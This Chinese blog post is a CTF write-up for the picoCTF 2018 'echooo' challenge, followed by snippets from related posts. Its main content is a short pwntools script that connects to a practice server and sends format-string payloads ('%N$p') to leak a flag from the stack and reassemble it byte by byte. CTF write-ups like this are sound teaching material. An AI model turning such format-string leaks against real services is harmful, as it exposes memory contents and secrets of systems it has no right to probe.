picoctf_2018_echooo(fmt)

最新推荐文章于 2022-11-18 16:17:48 发布
最新推荐文章于 2022-11-18 16:17:48 发布
阅读量366 收藏
点赞数
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/121420155
版权

picoctf_2018_echooo

这题还是蛮有意思的
请添加图片描述

程序分析:

它已经读取flag在栈上了,我们用格式字符串泄露出来flag就好
请添加图片描述
要写个脚本转换下,倒着组合一下

exp:

from pwn import*
#r=process('./PicoCTF_2018_echooo')
r=remote('node4.buuoj.cn',29996)
offest=11+(0x8c-0x4c)/4
print offest
flag=''
for i in range(11):
    payload='%'+str(i+27)+'$p'
    r.sendline(payload)
    r.recvuntil('> 0x')
    num4=int((r.recvuntil('\n')[:-1]),16)
    a=(num4&0xff000000)>>24
    b=(num4&0x00ff0000)>>16
    c=(num4&0x0000ff00)>>8
    d=num4&0x000000ff
    flag+=chr(d)+chr(c)+chr(b)+chr(a)
print flag
r.interactive()

请添加图片描述

picoCTF:picoCTF挑战的解决方案
03-31
微微CTF 您好,我将尽可能详细地发布针对picoCTF问题的解决方案。 我建议您先尝试自己解决问题,如果遇到困难,可以按照我的详细解决方案进行操作!
picoctf_2018_echooo
doudoudedi
09-23 545
发现是简单的32位格式化字符串但是并且flag存了栈上,直接泄漏就行了,但是内存是小端存储的,所以倒序输出即可 exp: from pwn import * #p=process('./PicoCTF_2018_echooo') p=remote('node3.buuoj.cn',26798) offset=11 flag='' for i in range(27,27+11): payload='%{}$p'.format(str(i)) p.sendlineafter('> ',p
picoctf_2018_rop chain
、moddemod
07-06 665
exp from pwn import * context.log_level = 'debug' proc_name = './PicoCTF_2018_rop_chain' p = remote('node3.buuoj.cn', 27027) elf = ELF(proc_name) flag_addr = elf.sym['flag'] win_function1 = elf.sym['win_function1'] win_function2 = elf.sym['win_function2'
PicoCTF_2018_are_you_root(未初始化验证漏洞)
seaaseesa的博客
04-17 878
PicoCTF_2018_are_you_root 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,只要符合条件就可以显示flag,但是按照正常的逻辑是不能的。 Login时,会malloc一个堆,大小为0x10,并且偏移8处就是auth的验证码。但是login时,并没有初始化*(v7+8)处的值,使得它的值是前面的操作影响。而strdup函数,内部会malloc一个与字符...
BUUCTF(pwn)picoctf_2018_are you root
半岛铁盒的博客
04-11 198
strdup: malloc一个参数字符串大小的内存,并且将字符串拷贝进去. 思路 利用login, 将我们想要的数据排列好, *(v6 + 2), 其实就是v6[2], 每四个字节就是一个数据 所以字符只需要是 ’aaaaaaaa’ + p64(0x5), 注意大小应该是0x10, 这样最好,可以百分百申请回来 将其释放掉 重新申请回来这样就不是 * v6指向它了而是v6指向它了 from pwn import * p = remote('node3.buuoj.cn',27037) p...
[BUUCTF] picoctf_2018_echo back
zyxx_wjc的博客
03-15 2891
BUUCTF picoctf_2018_echo back
BUUCTF:picoctf_2018_rop chain(write up)
qq_44768749的博客
08-26 1317
BUUCTF:picoctf_2018_rop chain0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp关键代码说明 0x01 文件分析 32位程序,开启了栈不可执行、部分RELRO保护 0x02 运行 输入一串字符串,根据题名也知道需要构造ROP 0x03 IDA 主函数 vuln函数 漏洞点:没有限制输入字符串长度 flag函数 win_function1函数 win_function2函数 0x04 思路 flag函数为后门函数
BUUCTF pwn wp 136 - 140
fa1c4的blog
04-28 576
pwnable_asm picoctf_2018_echooo jarvisoj_level6_x64 npuctf_2020_level2 [2020 新春红包题]3
PicoCTF-2019-WirteUp
Zichel77的博客
11-25 1436
1. 2Warm-General Skills 直接将十进制转化为二进制 picoCTF{101010} 2. Insp3ct0r-Web Exploitation https://2019shell1.picoctf.com/problem/63975/ 点击链接看到如下页面 点击What没有变化,点击How出现如下页面 说明是分别从HTML,CS...
[buuctf]picoctf_2018_are you root未初始化漏洞
weixin_46521144的博客
04-02 313
挺神奇的这道题,本地就是打不通,远程可以打通,绝了到底是为什么??? 本来以为这道题有一个指针置0的操作就没有UAF了,看来是我还见得太少,把UAF理解错了(其实我也没开始学堆哈哈哈哈) 参考了网上师傅的解答,发现这里是一个未初始化漏洞。我画个栈帧大家就明白了 先写一下函数长什么样 栈帧长这样 注意到一开始v6是一个二级指针,也就是指向数组的数组 strtok分配的内容是存在*v6里面的,所以上述栈帧应该是对的 那么在用完free之后呢,这里的指针归零是指:不能再用该指针寻
x_nuca_2018_offbyone2(off by null,unlink造成doublefree)
m0_51251108的博客
11-19 3231
x_nuca_2018_offbyone2: 在第七页挑了个题目做,好像不是很难 检查一下,got表可写 漏洞分析: 有个off by null 这题还有输出函数,挺好做的 利用思路: 1.利用off by null 造成unlink使指针数组中,由两个指针指向同一块地方 造成doublefree,我们再顺便泄露了libc 2.劫持free_hook为system,释放填有binsh的那个chunk就getshell了 exp: from pwn import * #from LibcSearcher i
BUUCTF刷题3
m0_51251108的博客
05-26 2772
题目:pwnable_start:wustctf2020_closed:hitcontraining_heapcreator:0ctf_2017_babyheap:ciscn_2019_es_7:jarvisoj_level5:hitcontraining_bamboobox: pwnable_start: 关键词: 汇编,泄露ebp,调试 思路: 1.查看汇编代码得知题目信息,发现read处可0x14后可溢出 2.依靠其中的write,是根据esp来确定打印addr,选择覆盖ret地址为write那里,便
pwnlib.exception.PwnlibException: Could not find ‘as‘ installed for ContextType报错解决
m0_51251108的博客
09-20 2044
做arm架构下的pwn题某个报错
2022NewStarCTF pwn大部分题解
最新发布
m0_51251108的博客
11-18 1945
今年9~10月的比赛,题目从易到难,知识面广,还是很不错的,复现一下这比赛的pwn
house of cat 学习
m0_51251108的博客
10-13 1291
house of cat的利用链学习
CISCN2021pwn pwny(数组越界,劫持exit_hook)
m0_51251108的博客
10-03 1232
CISCN2021pwn pwny(数组越界,劫持exit_hook)
用patchelf改程序后在exp中用gdb.attach()调试堆栈
m0_51251108的博客
09-28 1191
用patchelf改程序后在exp中用gdb.attach()调试堆栈
babyheap(uaf ,绕过tcache doublefree检测)
m0_51251108的博客
09-18 1103
浙江省第五届大学生网络与信息安全竞赛预赛pwn
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值